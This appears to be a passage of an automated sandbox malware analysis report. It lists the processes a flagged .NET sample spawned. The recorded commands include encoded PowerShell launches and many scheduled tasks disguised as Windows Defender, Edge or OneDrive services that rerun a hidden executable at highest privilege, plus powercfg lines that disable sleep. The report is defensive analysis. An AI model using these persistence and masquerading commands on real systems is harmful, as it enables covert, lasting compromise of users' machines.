                                                                                                                  File size:471552 bytes
                                                                                                                  MD5 hash:0326F45523014399DEA91452C957B5E0
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Yara matches:
                                                                                                                  • Rule: Linux_Trojan_Pornoasset_927f314f, Description: unknown, Source: 00000001.00000003.291048663.0000000006B81000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                  Antivirus matches:
                                                                                                                  • Detection: 100%, Avira
                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                  • Detection: 31%, ReversingLabs
                                                                                                                  Reputation:low

                                                                                                                  Target ID:2
                                                                                                                  Start time:00:17:11
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:cmd.exe" /C powershell -EncodedCommand "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
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:3
                                                                                                                  Start time:00:17:11
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:4
                                                                                                                  Start time:00:17:12
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:powershell -EncodedCommand "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"
                                                                                                                  Imagebase:0xeb0000
                                                                                                                  File size:430592 bytes
                                                                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                  Reputation:high

                                                                                                                  Target ID:5
                                                                                                                  Start time:00:17:14
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:6
                                                                                                                  Start time:00:17:14
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:7
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:8
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:9
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high

                                                                                                                  Target ID:10
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:11
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:12
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:13
                                                                                                                  Start time:00:17:15
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

Target ID: 14
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xb0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 15
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xff0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 16
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xff0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 17
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xff0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 18
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xb0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 19
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 20
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xb0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 21
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 22
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: SCHTASKS /CREATE /SC HOURLY /TN "RuntimeBroker" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xff0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 23
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xb0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 24
Start time: 00:17:15
Start date: 19/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 25
Start time: 00:17:16
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xff0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 26
Start time: 00:17:16
Start date: 19/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 27
Start time: 00:17:16
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xb0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 28
Start time: 00:17:16
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xff0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 29
Start time: 00:17:16
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit): true
Commandline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xff0000
File size: 185856 bytes
MD5 hash: 15FF7D8324231381BAD48A052F85DF04
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 30
Start time: 00:17:17
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xb0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 31
Start time: 00:17:18
Start date: 19/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 32
Start time: 00:17:18
Start date: 19/03/2023
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: "cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
Imagebase: 0xb0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 33
Start time: 00:17:18
Start date: 19/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff745070000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language

Target ID: 34
                                                                                                                  Start time:00:17:18
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:35
                                                                                                                  Start time:00:17:19
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:36
                                                                                                                  Start time:00:17:19
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:37
                                                                                                                  Start time:00:17:19
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                                                  Imagebase:0x7ff651c80000
                                                                                                                  File size:51288 bytes
                                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                  Has elevated privileges:false
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:38
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:39
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:40
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefenderServices\WindowsDefenderServicesServices_bk697" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:41
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:42
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:43
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareSericeExecutable\AntiMalwareSericeExecutableServices_bk64" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:44
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftUpdateServices\MicrosoftUpdateServicesServices_bk620" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:45
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "SettingSysHost\SettingSysHostServices_bk248" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:46
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff745070000
                                                                                                                  File size:625664 bytes
                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:47
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:"cmd.exe" /C SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
                                                                                                                  Imagebase:0xb0000
                                                                                                                  File size:232960 bytes
                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:48
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                  Wow64 process (32bit):true
                                                                                                                  Commandline:SCHTASKS /CREATE /SC HOURLY /TN "Agent Activation Runtime\Agent Activation RuntimeServices_bk903" /TR "C:\ProgramData\RuntimeBrokerData\RuntimeBroker.exe" /RL HIGHEST /f
                                                                                                                  Imagebase:0xff0000
                                                                                                                  File size:185856 bytes
                                                                                                                  MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language

                                                                                                                  Target ID:49
                                                                                                                  Start time:00:17:20
                                                                                                                  Start date:19/03/2023
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff745070000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:50
Start time:00:17:21
Start date:19/03/2023
Path:C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):true
Commandline:powercfg /x -hibernate-timeout-ac 0
Imagebase:0x100000
File size:80896 bytes
MD5 hash:FA313DB034098C26069DBADD6178DEB3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:51
Start time:00:17:21
Start date:19/03/2023
Path:C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):true
Commandline:SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRuntime" /TR "C:\ProgramData\RuntimeBrokerData\RegSvc.exe" /f
Imagebase:0xff0000
File size:185856 bytes
MD5 hash:15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:52
Start time:00:17:21
Start date:19/03/2023
Path:C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):true
Commandline:powercfg /x -hibernate-timeout-dc 0
Imagebase:0x100000
File size:80896 bytes
MD5 hash:FA313DB034098C26069DBADD6178DEB3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:53
Start time:00:17:21
Start date:19/03/2023
Path:C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):true
Commandline:powercfg /x -standby-timeout-ac 0
Imagebase:0x100000
File size:80896 bytes
MD5 hash:FA313DB034098C26069DBADD6178DEB3
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language

Target ID:54
Start time:00:17:22
Start date:19/03/2023
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
